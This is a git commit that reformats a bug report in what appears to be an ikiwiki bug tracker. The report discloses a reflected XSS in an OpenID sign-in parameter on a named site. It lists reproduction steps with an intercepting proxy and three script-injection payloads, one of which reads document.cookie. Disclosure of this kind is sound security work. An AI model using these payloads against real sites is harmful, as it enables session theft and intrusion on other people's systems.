fix formatting

author http://smcv.pseudorandom.co.uk/ <smcv@web>

Mon, 30 Mar 2015 10:56:25 +0000 (06:56 -0400)

committer admin <admin@branchable.com>

Mon, 30 Mar 2015 10:56:25 +0000 (06:56 -0400)
author http://smcv.pseudorandom.co.uk/ <smcv@web>
Mon, 30 Mar 2015 10:56:25 +0000 (06:56 -0400)
committer admin <admin@branchable.com>
Mon, 30 Mar 2015 10:56:25 +0000 (06:56 -0400)
diff --git a/doc/bugs/XSS_Alert...__33____33____33__.mdwn b/doc/bugs/XSS_Alert...__33____33____33__.mdwn

index 436e3faaec1fed04fa5d37e04bd14419db1168d8..2c147073a018d42e3e3be4cb56ea47e6d4b92007 100644 (file)
--- a/doc/bugs/XSS_Alert...__33____33____33__.mdwn
+++ b/doc/bugs/XSS_Alert...__33____33____33__.mdwn
@@ -5,14 +5,16 @@ Vulnerable Links:
  webconverger.org/ikiwiki.cgi?action=verify&do=signin&openid_identifier=1
  
  How To Reproduce The Vulnerability :
+
  1. Go to this link : webconverger.org/ikiwiki.cgi?action=verify&do=signin&openid_identifier=1
  2. refresh the page and intercept the http request using "brup suite" then at parameter "openid_identifier=" put xss payload
  3. forward the request
  
  XSS Payload :
-1. "></script><script>prompt(909043)</script>
-2. "></script><script>prompt("XSS Alert...!!! : Hacked By Raghav Bisht")</script>
-3. "></script><script>prompt(document.cookie)</script>
+
+1. `"></script><script>prompt(909043)</script>`
+2. `"></script><script>prompt("XSS Alert...!!! : Hacked By Raghav Bisht")</script>`
+3. `"></script><script>prompt(document.cookie)</script>`
  
  NOTE : Proof of concept is attached.
author	http://smcv.pseudorandom.co.uk/ <smcv@web>
	Mon, 30 Mar 2015 10:56:25 +0000 (06:56 -0400)
committer	admin <admin@branchable.com>
	Mon, 30 Mar 2015 10:56:25 +0000 (06:56 -0400)